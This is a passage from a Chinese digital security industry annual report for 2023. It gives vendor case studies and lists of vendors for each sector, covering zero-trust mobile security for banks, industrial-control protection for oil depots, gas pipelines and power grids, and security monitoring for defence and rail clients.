万多人,不同类型的应用,根据系统属性、用户范围、数据敏感性等在多个网络中部署。该金融机构根据未来战略计划和科技发展规划,整体网络架构,结合移动安全场景的需求,采用以全局视角设计全场景、按需弹性扩展的指掌易移动化安全解决方案。整体解决方案采用了终端安全沙箱、SDP 和 MFA 等关键技术,适用于金融机构的办公、展业、开发和运维管理等场景,提供用户可信接入控制、终端应用和数据保护、收敛互联网暴露面、数据传输安全等安全能力。根据金融机构办公终端设备类型,提供安卓、iOS、鸿蒙、Windows、中国数字安全产业年度报告 202339MacOS 和信创等跨平台终端的安全沙箱,办公应用和数据在沙箱环境中运行,增加水印、防止截屏、限制转发和数据加密等防泄露保护。对应用提供单点登录、应用预置和客户端调用能力,确保安全、稳定且简单易用。针对配发展业设备统一管理,推送、安装展业应用,根据相关政策要求,审计记录设备使用行为。建立“以身份为中心”的零信任体系,通过 SDP 的两个核心组件,将控制面和数据面分离,由IAM提供多因素认证和统一身份管理,全面落实零信任“从不信任-持续验证”的理念。该金融机构所有接入的终端设备先认证后连接,确保用户、设备和环境可信接入,最小化授权资源访问,以及安全通道数据加密传输。同时,应用服务端口不再直接向互联网暴露,隐藏在 SDP 之后。在 OA 网、生产网、研发管理区以及子公司网络 6 个相互独立隔离的网络中,采用集群高可用方式部署于同城双数据中心。一体化安全管理平台,提供用户、设备、安全策略和日志报表等可视化管理。截止目前,现有已将 30 多个 APP、B/S 和 C/S 等办公业务应用通过指掌易平台提供安全可信接入和数据防泄露保护。【用户评价】指掌易安全管理平台上线 2 年多时间以来,原来向互联网开放的办公业务应用服务实现了隐藏,被攻击的频率明显减少。长期存在的社工、网络钓鱼等攻击手段,结合产品安全策略配置,得到有效抑制。近期,我行持续参与第三方的多次攻击演练活动,有效抵御了各类攻击。在安全性方面得到了验证,达到了预期目标。接下来,我行陆续将办公、业务应用基于指掌易平台使用,业务模式也不再依赖于以往的指定配发设备,逐步推广“全员营销”加速业务发展。整体产品方案,值得投入建设和推广使用。40某全国性股份制商业银行移动安全建设案例北京梆梆安全科技有限公司【用户需求】随着各种利用 Web 应用漏洞进行攻击的事件正在与日俱增,各类拟人化自动化攻击、API 业务攻击、0day 攻击对金融数字化业务的影响也在快速攀升,攻击手段愈发多元化,移动应用安全已经成为金融行业数字化进程的重中之重。数据驱动的金融业务创新对网络安全规划和建设提出了更高要求金融行业数字化转型带来了资源开放和共享,使数据更容易以转存、截屏、分享等方式被外发,或因终端丢失等原因导致数据泄露,资产暴露面变大,受攻击维度增多。金融数据的交互、传输、共享等往往有多方参与,数据泄露风险点激增,风险环境愈发复杂。金融科技数据安全风险防范和隐私保护难度加大个人金融信息保护技术规范金融数据安全 数据安全分级指南金融业数据能力建设指引金融数据安全 数据生命周期安全规范证券期货业数据安全管理与保护指引等行业监管政策和标准陆续发布实施,金融业强化数据应用的安全性与合规性迫在眉睫。传统静态安全防御已无法满足金融科技网络安全需求随着科技与业务深度融合,延伸出隐私加密、人脸识别绕过、高级威胁攻击等新的安全问题,传统的金融服务模式已经不能匹配最新的数字化需求。数据多接口开放,API 易被利用成为数据泄漏源API 作为驱动开放共享的核心能力,已深度应用于金融行业;与此同时,其巨大的流量和访问频率也让数据安全风险面变得更广、影响更大,同时由于其固有的可访问性,成为了网络犯罪团伙的完美目标。【解决方案】中国数字安全产业年度报告 202341梆梆安全基于已有的威胁情报数据、快速变化的业务场景、金融行业的客户积累,从不同场景的个性化需求出发,已形成基于热点场景的移动安全全栈解决方案。图 25移动安全建设矩阵人脸识别绕过从人脸识别绕过看技术与业务双轮驱动的风控升级,实现对“人脸识别”绕过等安全风险的监测并将其落地。预防,减少攻击风险;事前,提高攻击门槛;事中:实时监测状态;事后:攻击事件溯源。屏幕共享电信诈骗安全键盘 SDK 可以防基于远程会议系统共享屏幕的信息泄露,同时,为了保障中老年用户的使用安全,可以定义按键时是否发音或震动。以避免防录屏这种模式下,用户的无感知操作导致的误操作;移动安全监测具备:应用破解检测、异常使用手段检测、运行环境风险检测等关键技术能力,针对APP 前端建立长效的监测防御机制。个人隐私合规保护基础性保障(快速合规,短期内不被通报) 建设性完善(常态化个人信息保护合规评估服务) 安全合规基线化落地(长期的自生安全合规能力沉淀)。移动自生安全能力建设42移动安全能力平台赋能企业人员移动安全攻防能力,为移动新业务场景、新技术业务场景提供最佳安全实践和经验。拟人化攻击电信诈骗API 安全平台与传统的移动安全产品联动,将客户端环境与服务端流量相结合,解决客户 API 面临的安全风险,有效的形成完整的闭环解决方案,真正形成 1(客户端) 1(服务端)2 的效果。【用户评价】我行非常注重自身移动安全体系的完善,采购梆梆安全的移动安全监测平台,以平台为抓手在网络安全攻防演练中取得了好成绩,并与应用加固等静态安全手段形成防御闭环,有效增强移动安全风险监控预警和溯源响应能力。个人信息合规检测平台、API 安全平台以及移动安全能力平台将持续为我行在API 风险管控、个人信息合规检测能力以及移动安全自生能力等方面贡献价值。中国数字安全产业年度报告 2023433、运营商网络边界安全华为、迪普科技、新华三、深信服、奇安信、信安世纪流量安全端点安全亚信安全、绿盟科技、天融信、安天、安恒信息网站安全云盾智慧、华为、迪普科技、新华三、网宿科技云安全观安信息、瑞数信息、山石网科、绿盟科技、亚信安全、安全狗移动安全梆梆安全、爱加密、联软科技开发与应用安全默安科技、悬镜安全、孝道科技、软安科技、酷德啄木鸟互联网安全观安信息、瑞数信息、恒安嘉新办公安全保旺达、思维世纪密码新华三、华为、信安世纪攻击面收敛天懋信息、安博通、未来智安、观安信息网络空间资产测绘魔方安全、华顺信安威胁情报微步在线、奇安信、360数字安全漏洞与补丁管理斗象科技、默安科技身份安全竹云、派拉软件、亚信安全、保旺达模拟伪装观安信息、默安科技、长亭科技、元支点态势感知亚信安全、启明星辰、天融信、深信服威胁检测与响应中科网威、启明星辰、绿盟科技、天融信、未来智安、兰云科技安全管理安全狗、安恒信息、深信服检测与测评竞远安全、赛宝认证、深圳网安安全演练赛宁网安、四叶草安全、丈八网安、博智安全数据贮存安全安华金和、闪捷信息、炼石网络数据访问安全明朝万达、天空卫士、北信源、天融信、思维世纪、世平信息信息基础设施保护信息计算环境保护应用场景安全基础与通用技术体系框架安全运营数据安全华为、新华三、迪普科技、奇安信、科来网络、斗象科技安博通、恒安嘉新、武汉绿网图 26运营商444、公安物理安全万里红网络边界安全天融信、深信服、奇安信、启明星辰、腾讯安全、世安智慧流量安全安天、恒安嘉新、奇安信端点安全网站安全阿里云、知道创宇、盛邦安全、网宿科技、腾讯安全区块链安全知道创宇、成都链安云安全腾讯安全、青藤云安全、知道创宇、深信服、安恒信息移动安全明朝万达、天融信、奇安信、筑泰防务、创原天地物联网安全慧盾安全、金盾软件、天防安全、迪普科技、盈高科技、世安智慧公共安全互联网业务安全腾讯安全、美亚柏科、绿盟科技、恒安嘉新开发与应用安全奇安信、安恒信息密码华澜微、三未信安、数字认证、吉大正元、格尔软件、中宇万通网络空间资产测绘360数字安全、埃文科技、默安科技、云弈科技攻击面收敛天防安全、天懋信息身份安全安恒信息、奇安信、领信数科态势感知安恒信息、奇安信、启明星辰、天融信、深信服威胁检测与响应奇安信、安天、安恒信息高级威胁防御安天、奇安信、中睿天下安全管理安恒信息、奇安信、绿盟科技、启明星辰安全演练永信至诚、烽台科技、奇安信、腾讯安全、安恒信息数据贮存安全安华金和、慧盾安全、昂楷科技、美创科技数据访问安全慧盾安全、安恒信息信息基础设施保护信息计算环境保护应用场景安全行业环境安全基础与通用技术体系框架安全运营数据安全绿盟科技、青藤云安全、安恒信息、奇安信、深信服安芯网盾、安全狗、天融信美亚柏科、迪普科技、金盾软件、慧盾安全、天防安全天懋信息、腾讯安全图 27公安 中国数字安全产业年度报告 2023455、国防物理安全中超伟业、中孚信息、博智安全、北信源网络边界安全天融信、启明星辰、奇安信、电信安全流量安全天融信、启明星辰、奇安信、安天、观成科技端点安全北信源、奇安信、青藤云安全、江民科技网站安全知道创宇、天融信、启明星辰区块链安全北信源、知道创宇云安全青藤云安全、奇安信、知道创宇、启明星辰移动安全指掌易、北卡科技、奇安信、天融信、北信源物联网安全格尔软件、天融信、启明星辰公共安全美亚柏科、北信源、天融信工业互联网安全博智安全、中电安科、天融信、启明星辰、奇安信车联网安全天融信、奇安信办公安全中超伟业、奇安信、航天启星密码吉大正元、天融信、格尔软件、中孚信息网络空间资产测绘知道创宇、埃文科技、360数字安全、斗象科技态势感知天融信、启明星辰、奇安信、深信服威胁检测与响应奇安信、碳泽信息高级威胁防御奇安信、安天、中睿天下咨询与评估太极股份、奇安信检测与测评中孚信息、安天安全管理启明星辰、奇安信安全集成太极股份安全演练永信至诚、赛宁网安、丈八网安数据贮存安全明朝万达数据访问安全天空卫士、明朝万达、航天启星信息基础设施保护信息计算环境保护应用场景安全行业环境安全基础与通用技术体系框架安全运营数据安全图 28国防46某国防客户安全监管解决方案天翼安全科技有限公司【客户问题和痛点】由于安全监管平台建设工作要求,某国防客户需在短时间内推进二级单位安全监管平台全覆盖,加快集团总部及所属单位互联网出入口收敛,切实减少暴露面和风险点,初步形成基础设施一张网、资产态势一张图、安全监管一盘棋、风险管控一条线、产业服务一站通等支撑能力,实现国资央企网络信息安全能力水平整体提升。【解决方案】中国电信“天翼安全大脑”通过本地设备和云端分析平台的联动,实现云端安全分析服务 本地安全攻击防御的双重安全服务,构建简单、高效、易用的安全云服务方案,降低安全分析工作的难度、提升安全运维工作的效率,从而降低客户在安全运维方面投入的成本,为客户提供新型的“可管理安全服务”。中国电信天翼安全大脑面向有各类安全防护需求,但缺少安全控制管理手段的政企客户。中国电信天翼安全大脑基于网络安全运营平台,提供流量控制、入侵防御、攻击阻断、病毒查杀、上网行为审计等标准化安全服务,助力政企客户构建云侧运营分析、边侧威胁阻断、端侧贴身防护的云边端联动防护体系。【技术原理】中国电信天翼安全大脑服务平台作为整体方案的分析和服务中心,通过与安全网关联动,采集本地设备上报的全流量日志、安全事件相关告警数据,对数据进行二次分析,排除误报并分析出精准的安全事件,对于授权给云端进行自动处置的客户直接闭环安全事件;对于未授权给云端进行自动处置的客户产生处置建议,并将处置建议通过短信和邮件的方式发送给客户,从而完成安全服务的闭环。中国数字安全产业年度报告 202347【防护效果】经济:高效构建一张广覆盖,快部署,高可靠,高安全的企业专用广域网。可视:对全网链路流量进行可视化监控,全面掌握广域网链路流量和告警故障情况。易管:在保障安全的基础上,提供最有性价比的组网方案,满足越来越高的带宽需求。高效:能够远程管理,按需调度,统一规划,快速恢复,优化使用体验同时降低管理难度。中国电信天翼安全大脑上线后,完全满足合规要求,将互联网暴露面压缩到最低。众多二级/三级单位的设备,在总部统一维护,实时告警,在二级/三级单位无感知的情况下,完成业务切换。【客户评价】中国电信天翼安全大脑兼顾安全和组网,流量按需调度,从根本上解决了流量拥塞问题。我们可以通过小盒子很直观地看到设备状态,便于及时维护。背靠中国电信,电信安全所提供的运营商级安全服务确实出色,对比传统硬件堆叠的安全服务好很多,服务响应很及时,国资企业品质有保障。486、能源网络边界安全新华三、安盟信息、天融信、深信服、奇安信、启明星辰流量安全科来网络、启明星辰、绿盟科技、新华三、天融信、奇安信、安天工业互联网安全开发与应用安全默安科技、悬镜安全、思客云、绿盟科技、边界无限互联网安全微步在线密码格尔软件、吉大正元、数字认证、中孚信息、江南天安网络空间资产测绘默安科技、聚铭网络漏洞与补丁管理安恒信息、奇安信、绿盟科技攻击面收敛长扬科技、烽台科技、华顺信安威胁情报微步在线身份安全竹云、九州云腾、宁盾科技、芯盾时代模拟伪装默安科技、经纬信安、斗象科技态势感知绿盟科技、启明星辰、天融信、深信服威胁检测与响应未来智安SASE 网宿科技咨询与评估奇安信、太极股份、长亭科技检测与测评中孚信息、安天安全管理安恒信息、启明星辰、奇安信、绿盟科技安全集成太极股份安全演练数据访问安全天空卫士、天融信、奇安信、启明星辰信息基础设施保护应用场景安全行业环境安全基础与通用技术体系框架安全运营数据安全威努特、长扬科技、天地和兴、中电安科、珞安科技、六方云网藤科技、烽台科技、启明星辰、天融信、奇安信永信至诚、烽台科技、绿盟科技、长扬科技、长亭科技易霖博、软极网络图 29能源 中国数字安全产业年度报告 202349中国石油某销售公司油库网络安全改造推广项目案例北京威努特技术有限公司【用户需求】油库是协调原油生产、原油加工、成品油供应及运输的纽带,是国家石油储备和供应的基地,它对于保障国防和促进国民经济高速发展具有相当重要的意义。为了油库生产网络的安全可靠运行,提出以下项目建设需求:总体需要遵循中石油相关安全管理规定,参照等级保护以及安全基线要求,结合部署在总部数据中心系统和部署在库站系统的实际情况,制定有效的安全提升方案,落实网络安全负责主体,做到“组网清晰、外网防护、内网阻断、综合防护、统一管理”。组网清晰:梳理网络架构、摸清家底,针对现有系统进行初步评估;外网防护:油库生产系统主机设备禁止访问互联网;内网阻断:实现生产网与办公网物理级别隔离,生产子系统之间实现逻辑隔离,网络边界处阻断非法请求、异常指令、攻击行为等;综合防护:油库生产主机及服务器实现已知和未知病毒防护、安全基线加固、外设管控等,实现网络流量审计、工业业务行为审计;统一管理:建立库级统一安全管理中心,实现库级工控网络安全设备集中管理、统一展示。【解决方案】安全服务项目前期采用“调研 风险评估”的方式,针对 11 座油库进行细致的资产梳理、安全评估,从系统结构、要素、生命周期等方面确定调研及评估范围,采取文档查阅、现场访谈、现场检查等评估方法,最终协助客户识别资产约400 点位,并对所有点位之间的网线、业务连接情况进行了梳理,绘制了 11份与各座油库正在运行相符的拓扑图。识别9大类威胁、脆弱性问题2000余项、输出文档 30 余份,为后期的安全建设提供了第一手资料。50安全建设借鉴中石油相关安全管理规定,参照等级保护以及指导方案要求,结合部署在总部数据中心系统和部署在库站系统的实际,制定了基于“行为白名单”的“纵深安全防御”技术方案,满足等保 2.0“一个中心、三重防护”以及中石油信息处规划总院的销售工控系统安全防护指导方案要求,进而构筑油库生产系统“安全可信环境”,确保:只有可信任的设备,才能接入系统网络;只有可信任的消息,才能在系统网络上传输;只有可信任的软件,才允许被执行。图 30项目总体建设示意图项目主要建设内容为解决油库生产系统网络安全架构缺失,边界划分不清晰,没有合理的访问控制机制问题,将油库现场监控层的储运控制站、消防控制站以及安防系统分别划分为不同的安全区,并在安全区边界处串联部署工业防火墙,运用“白名单 智能学习”技术建立油库生产网络区域间通信模型,保证只有可信任的流量可以在网络上传输,为生产网络与外部网络互联、生产网络内部区域之间的网络连接提供安全保障;在过程控制层与生产管理层之间部署安全隔离与信息交换系统,在保障油库办公网与生产网之间数据安全交换的同时,最大限度保证客户应用的方便性;为解决油库工控主机、业务服务器缺少安全防范机制问题,分别在数据管理平台服务器、装车监控主机、罐区监控主机、消防监控主机以及安防监控主 中国数字安全产业年度报告 202351机上安装工控主机卫士软件,采用不同于传统防病毒软件的轻量级“白名单”机制,有效阻止包括 STUXNET、Flame、Havex、WannaCry、BlackEnergy 等工控恶意程序或代码在工控主机上的执行、扩散;为解决油库底层生产业务网络缺少安全审计机制问题,在过程监控层的核心网络节点处旁路部署工控安全监测与审计系统,实时检测针对工业协议的网络攻击、用户误操作、用户违规操作、非法设备接入以及蠕虫、病毒等恶意软件的传播并实时报警,同时详实记录一切网络通信行为,包括指令级的工业控制协议通信记录,为油库生产系统的安全事故调查提供坚实的基础;为满足等保 2.0 标准中对安全管理中心的建设要求,在过程监控层的核心网络节点处部署统一安全管理平台系统,实现对工业防火墙、工控主机卫士、工控安全监测与审计系统等工控安全资产的集中管理、安全策略的集中管控、安全事件的集中分析,提供油库安全态势分析,解决油库资产和安全运营可视化的难题。【用户价值】防护效果:项目建设完毕后,某油库销售公司邀请国家工信部渗透测试专家对油库生产网络安全建设效果开展了专项安全评估和渗透测试,测试均达到了油库生产网络安全防护的预期效果,为此石油销售公司致信感谢威努特。经济效益:项目建设完成后全面提升某油库生产系统的整体安全性,保障油库生产系统的高效运行,同时减轻运维人员的工作量,提高了安全生产管理水平。【客户评价】由于该项目时间紧、任务重,且为了不影响油库的正常发油业务,项目组成员经常在夜晚油库不发油的情况下进行资产调研、线路梳理、网络切换等,放弃了多个节假日及周末的休息时间在用户现场加班工作。项目组成员不怕吃苦、认真负责的工作态度及专业的技术水平得到了我公司信息处领导及各个油库负责人的一致好评。在此,我公司对贵公司负责实施该项目的项目组成员表示衷心的感谢。52某干线天然气管道公司工控安全解决方案杭州中电安科现代科技有限公司【用户需求】随着天然气管道企业信息化、管控一体化的建设与实现,越来越多的控制系统通过信息技术实现互联互通,使得工控系统网络架构愈发复杂,迫使内部的安全隐患逐渐暴露,工业控制系统网络安全问题日益突出,一旦各类生产系统遭受恶意攻击、勒索病毒等安全威胁,发生生产事故,将会直接导致经济损失、燃气泄漏甚至人员伤亡。中电安科已帮助某干线天然气管道公司完成信息化建设,根据某干线天然气管道公司实际情况,结合网络安全等级保护基本要求、网络安全等级保护安全设计技术要求和工业控制系统信息安全防护指南等相关标准要求,科学合理评估某干线天然气管道 SCADA 系统合规差距和安全风险,确定安全保护措施,在此基础上设计了一整套完整的安全体系,以“一个中心、三重防护”为核心指导思想,从安全计算环境、安全区域边界、安全通信网络以及安全管理中心构建安全技术体系,满足等级保护第三级系统的相关安全要求。【解决方案】图 31某干线天然气管道公司解决方案示意(1)安全区域边界调度中心在与站场控制系统、阀室等网络连接边界处要通过部署工控防火 中国数字安全产业年度报告 202353墙进行边界防护,基于工控协议配置合理的主机访问规则,针对工业控制网络在同一个大网的情况,通过 ACL 等安全访问策略的配置对生产网络进行逻辑分区。调度中心内部 SCADA 系统与中间数据库或管理信息系统之间,部署隔离工业网闸保证其安全性,除必须开放的用于数据交换的特定应用通道外,不提供任何对外的服务。(2)安全通信网络在工业交换机侧旁路部署工控安全监测审计系统,通过镜像接口分析网络中的网络流量,实现对工控网络中的网络流量进行采集、监测和分析,有效识别工控网络中的安全隐患、恶意攻击以及违规操作等安全风险。(3)安全计算环境通过在主机上安装终端防护代理程序,实现对工业主机的进程白名单管理,移动存储介质使用进行管理,有效抵御未知病毒、木马、恶意程序、非法入侵等针对终端的攻击,实现安全防护。通过数据库审计系统实现对来自网络的数据库访问行为进行记录,及时判断出违规操作行为并进行记录、报警,为数据库系统的安全运行及事后审计提供有力保障。(4)安全管理中心通过工控安全管理平台,针对被防护资产综合全部安全要素信息,通过多种数据、分析方法构建动态的多层次、全天候网络安全管理,结合等级保护管理,为天然气管道构建网络安全动态深度防御体系形成对安全威胁、风险隐患的动态持续管理。54通过堡垒主机,实现运维单点登录,统一管理运维账号,管理运维授权,并对运维操作进行审计记录,并通过堡垒机实现对运维角色与权限的划分。【用户评价】有效提升了企业网络安全防护管理的合规性,符合国家主管部门、行业监管部门的管理要求以及工控安全防护要求。安全建设采用最低干扰方式,未对业务产生任何影响,通过可视化平台可清晰的看到生产网各节点的通讯情况,对资产的掌握情况大幅提升,通过本次安全建设实现了对生产网网络安全事件的事前预防、事中控制、事后可查,保障了天然气管道控制系统的安全运行。中国数字安全产业年度报告 2023557、电力网络边界安全新华三、天融信、深信服、奇安信、启明星辰流量安全科来网络端点安全奇安信、安全狗、绿盟科技、天融信、云弈科技工业互联网安全开发与应用安全默安科技、思客云、绿盟科技、酷德啄木鸟网络空间资产测绘360数字安全、聚铭网络、斗象科技攻击面收敛华云安、长扬科技、烽台科技威胁情报微步在线、奇安信、360数字安全身份安全芯盾时代、九州云腾、保旺达、申石软件、齐治科技模拟伪装长亭科技、锦行科技态势感知观安信息、深信服、安恒信息、奇安信检测与测评竞远安全安全演练烽台科技、永信至诚、博智安全数据访问安全闪捷信息、华途信息、霍因科技、志翔科技信息基础设施保护应用场景安全行业环境安全基础与通用技术体系框架安全运营数据安全天地和兴、威努特、长扬科技、中电安科、启明星辰天融信、奇安信、绿盟科技图 32电力56电力新能源工控安全态势感知平台建设案例北京威努特技术有限公司【用户需求】解决目前电力行业特别是具有集控中心的新能源企业普遍存在的工控系统信息安全孤岛、资产台账不全、无法集中管控等问题,针对可能面临的网络安全风险或正在发生的网络安全事件进行持续监测并及时预警,切实提升新能源场站关键信息基础设施的安全监测能力、态势感知能力和事件应急处置的数据支撑能力。【项目内容】通过对某新能源有限公司所涉及电力监控系统生产控制大区的网络安全监测(包括基于区域边界的安全监测、基于网络通信的安全监测和基于计算环境的安全监测),为集控中心工控安全态势感知平台提供支撑数据;完成新能源工控安全态势感知平台数据处理技术、数据智能分析技术和数据展示技术的创新研究,进而研发并建设一套具有新能源发电行业特色的工控安全态势感知平台,最终实现全国工控安全在线监测网络企业级节点的建设。【解决方案】项目整体秉承监测、防护、应急“三位一体”的理念开展建设。根据工控安全态势感知平台的数据采集需求,借鉴 GB/T 22239-2019信息安全技术 网络安全等级保护基本要求的“一个中心,三重防护”的架构完成“一个中心、三重监测”的设计,同时为提高系统运维效率,将各新能源场站中新增的探针通过统一安全管理平台实现策略统一管理,监测安全设备的运行状态和策略的调整,包括:策略的增加、删除、修改等操作。此外,工控安全态势感知平台按照网络安全三同步原则,在不影响新能源场站现有设备、系统、网络等正常运行的情况下,充分考虑工控安全态势感知平台自身的网络安全等级保护要求。最终建成一套具备资产探测发现、多源数据采集、安全态势分析、安全 中国数字安全产业年度报告 202357态势展示、告警分析处置、攻击溯源追踪、安全统计报表等功能的工控安全态势感知平台。图 33本项目通过深入的创新研究,技术水平已经达到国内领先;并取得了中国电力企业联合会颁发的科学技术成果鉴定证书。研发了工控数据库的安全审计分析技术。通过对工控数据库的全面审计,跟踪工控数据访问异常行为和违规行为,实现数据库行为建模、智能分析、态势感知、实时预警;研发了基于多视角报警融合的隐蔽攻击发现技术。通过提取资产信息、漏洞信息、拓扑信息等信息流特征和控制流程、能量信息、业务信息等物理流特征,实现了多视角报警;研发了基于知识图谱和机器学习的态势分析和威胁检测技术,采用数据挖掘算法提取攻击时间、攻击序列、攻击属性等特征,并依据上述特征构建工控网络攻击树,从攻击树中建立物理流与信息流映射关系;研发了工控网络安全健康指数评估体系。通过构建任务树模型和工业主机、网络边界、通讯网络的安全指数指标体系,准确识别与判定网络安全等级。【应用效果】工控安全态势感知平台的建成,解决了目前新能源企业普遍存在的工控系统信息安全孤岛、资产台账不全、无法集中管控等问题,实现了对网络资产和网络拓扑进行可视化发现、管理,能够监测网络安全防护措施和网络运行安全状态,能够对网络漏洞情况、合规配置、安全事件、网络威胁等风险进行监测58预警,提供了全方位、全天候的网络安全态势感知展示和事件应急处置的数据支撑;并通过使用成熟的主流大数据存储分析技术,将新能源场站的数据进行存储、处理和分析,将数据与集控中心进行对接,实现电力监控系统网络的安全威胁分析。【用户评价】本次项目实施阶段威努特项目组成员表现出了不怕苦,勇于克服困难,设身处地为客户着想的奉献精神,克服了严寒环境下室内外的复杂穿线环境,积极承担场站多个设备重新上架部署,在原有系统运行未受影响的情况下解决了场站设备无处安放的问题,提高了施工效率。施工过程中表现出了专业的技术水准,设备安装、网线敷设水平堪称一流,被定为样板,已在随后的项目施工过程要求按此标准执行。在此对本次项参加本次实施的项目组的辛苦付深表感谢,并提出表扬!希望贵公司继续保持优良的施工风范及服务理念,并衷心祝愿我们在今后的工作中能精诚合作共铸辉煌!中国数字安全产业年度报告 202359竞远安全电力行业网络安全综合服务案例广州竞远安全技术股份有限公司【服务内容及背景】定制化网络安全综合服务,包含:等保测评、商密测评、风险评估、安全培训、应急响应等。近年来,针对电力关键信息基础设施的网络攻击更加常态化、专业化,针对性极强,造成了大量的经济损失及社会影响。为配合某电厂集团公司及电网完成 2022 年电力监控系统等保测评及安全防护评估等要求,需对某电厂生产控制系统开展等级保护测评(简称等保测评)、商用密码应用安全性评估(简称商密测评)及安全防护评估工作。实施内容包含八套三级电力监控系统进行安全等级保护测评和安全防护评估,一套 DCS 系统商用密码应用安全性评估。【用户需求】专业可靠,资质齐全客户更想通过相关的安全测评,真实有效的把单位的安全隐患展现出来,让客户未来更有针对性的开展网络安全管理工作,进一步增加网络和信息系统安全管理的规范性和有效性,提高单位的整体安全意识,增强网络抗攻击的能力,最大程度确保网络和信息系统正常运转。技术过硬,高效服务用户需要一家值得信赖同时具备等保测评、商密测评、风险评估、安全培训等资质的单位,出具的测评报告并能真实有效反应单位真实的安全隐患,促进整改,符合国家法律法规及监管部门的网络安全要求。与此同时,因招标流程及内部流程原因导致项目延误,用户亟需保质保量,高效完成安全测评。60【解决方案】随着传统电力系统和信息化的深度融合,确保网络时代电力系统安全、稳定、高效运行和高质量供电始终是电力行业面临的重大考验。电力信息设施一般具有分布广泛、结构复杂、交互性强等特点,导致风险点多和接触面广,防护难度大,特别是关键电力调控中心、电网枢纽、核电站、大型火电、水电设施等重要目标一旦发生安全事件,后果十分严重,影响范围极大。竞远安全依据合规治理原则设计,结合电力关键基础设施信息系统安全标准要求,为客户提供全流程的网络安全分类分级服务、等保测评、商密测评、数据安全评估服务,为客户开展安全培训,提高安全意识,助力客户开展网络安全合规建设与网络安全管理体系建设,明确数据分类分级、风险评估、安全认证、应急响应等关键制度规范要求。竞远安全为全国电力单位提供超过 100套电力监控系统等级保护测评服务及安全防护评估服务,有用出色的电力行业融标能力。通过与其他电厂对比及对电力行业相关安全管理规范的解读,结合客户实际情况,与当地业务主管部门沟通交流,最终提出建议客户对八套系统合并进行专家评审,加速项目进程,提高工作效率。项目从 2022 年 11 月 12日第一次进场实施到 2022 年 12 月 09 日完成交付,历时不到一个月时间,通过各部门紧密配合,顺利完成项目验收工作。【用户评价】竞远安全是国内为数不多的、同时具备等保测评、商密测评、风险评估、安全培训等资质的安全服务提供商,能够一站式解决我们的安全服务需求。且竞远安全实施团队非常专业,对我们的实际情况做了很深入的分析,急客户所急,会协助我们与主管部门反复沟通汇报,最终能在不到2个月时间内高质量、高效率完成了整个项目。中国数字安全产业年度报告 202361某省输电变电站杭州中电安科现代科技有限公司【用户需求】输电变电站电力监控系统是国家关键基础设施,电力系统的安全运行与政治安全、经济安全、网络安全、社会安全等诸多领域密切关联,一旦发生大面积停电事件,可能引发跨领域连锁反应,导致重大经济财产损失,甚至引发社会恐慌,危及国家安全。某省输电变电站已按照电力行业 36 号文规范,网络安全建设符合“安全分区、专网专用、横向隔离、纵向认证”要求,但在资产识别管理、流量解析与通信拓扑绘制、白名单基线与未知威胁 0Day 告警等方便比较欠缺,通过建设输电变电站流量监测预警与资产测绘,对电力监控系统网络流量采集、解析和分析,扩大现有安全监视的范围,对网络空间中异常资产及网络行为进行有效检测,提供回溯分析依据,从而提高电力监控系统网络安全防护水平,减少网络安全事件的发生。【解决方案】图 3462在输电变电站厂站/区分别部署流量采集分析装置,实现生产控制区内网络流量的采集、分析和存储,然后通过调度数据网将流量采集分析装置的数据上送到位于某省主站区部署的流量安全分析平台,实现输电变电站生产控制区流量数据的汇总集中监测与分析展示,有效识别网络中的安全隐患、恶意攻击以及违规操作等安全风险。(1)采集各类常见的通用网络协议和工控协议,包括:数据链路层、网络层、传输层、应用层。重点对电力协议进行采集并深度解析,如:IEC103、IEC104、MMS、GOOSE/SV 等。各类协议流量按照流量特征格式或原始流量进行存储,对发生异常事件的流量片段进行标记存储。(2)基于协议深度解析,对电力监控系统网络中的所有活动提供协议流量审计,生成完整记录并进行通讯行为识别。(3)对网络流量实时分析,动态识别电力监控系统网络中的设备和属性,人工对资产的属性进行管理,包括名称、类型、厂商、IP/MAC、地理位置、联系人、资产登记等。(4)内置流量负载规则库,对特征值进行分析匹配,及时发现流量的异常信息并进行告警,实现对组态变更,异常操控指令,程序下装等关键事件进行识别和告警,保证电力监控系统在正确配置下运行,如对 IEC61850 协议,IEC 104 协议等进行深度解析后,分析对应特定场景下的关键操作行为(遥控操作、改定值操作)等。(5)通过对流量数据的学习,建立通信协议行为基线,识别异常的协议状态请求、控制协议指令;建立通信流量基线,监测通信链路、通信协议、持续时间、源与目的等特征的通信行为;建立通信链路基线,检测协议范围的流量、链路中断等事件。(6)通过流量分析识别系统中所有通信链路,提供通信链路中的源/目的 IP、源/目的端口、通信协议、链路最早建立时间、链路最新通信时间、中国数字安全产业年度报告 202363包吞吐量等信息,自动以拓扑图的形式直观展示网络中各个设备节点之间的通信连接情况,对于存在入侵等告警信息的通信链路,在拓扑图上提供可视化的异常展示与告警。图 35(7)提供基于规则的关联分析引擎,支持通过关联分析,从低风险事件中发掘高风险威胁的能力。【用户评价】输电变电站流量分析增强了二次安防流量检测方面的能力,规范了电力监控系统网络中的资产和行为,可以事前防御由病毒、入侵、异常接入、程序逻辑等导致的安全生产事故,杜绝重大灾难性事件,可以有效预警类似伊朗“震网”事件、乌克兰电网事件的恶意攻击。通过流量资产测绘提高了对省内分布数量众多的输电变电站的资产管理运维能力,网络行为分析实现了及时的安全事件预警,有利于保障输电调度的安全生产运行。648、轨道交通 网络边界安全深信服、天融信、深信服、奇安信、启明星辰流量安全启明星辰、绿盟科技、奇安信、新华三、天融信端点安全奇安信、360安全、天融信、绿盟科技、火绒安全、安天物联网安全锐捷网络、迪普科技工业互联网安全开发与应用安全默安科技、悬镜安全密码华澜微、万里红网络空间资产测绘默安科技、魔方安全攻击面收敛长扬科技、烽台科技、华顺信安身份安全九州云腾、芯盾时代、申石软件模拟伪装默安科技、长亭科技、经纬信安、非凡安全安全演练博智安全、烽台科技、长扬科技数据贮存安全明朝万达、华途信息数据访问安全天空卫士、天融信信息基础设施保护信息计算环境保护行业环境安全应用场景安全基础与通用技术安全运营数据安全中电安科、威努特、安恒信息、六方云、天地和兴、珞安科技启明星辰、天融信、奇安信、绿盟科技图 36 轨道交通 中国数字安全产业年度报告 202365某城市轨道交通列车智能运维安全防护方案杭州中电安科现代科技有限公司【用户需求】我国轨道交通行业列车(高铁、地铁)具有数量多、运量大、长期性、连续性和复杂性的运营特点,对列车车载系统安全性、可靠性和易维护性都有着越来越高的要求,同时关键信息基础设施安全保护条例于 2021 年 9 月 1日正式落地实施,交通作为关键信息基础设施是经济社会运行的神经中枢,是网络安全的重中之重,也是可能遭受攻击的重点目标。面向快速发展的交通行业,列车车载系统需要将数据通过 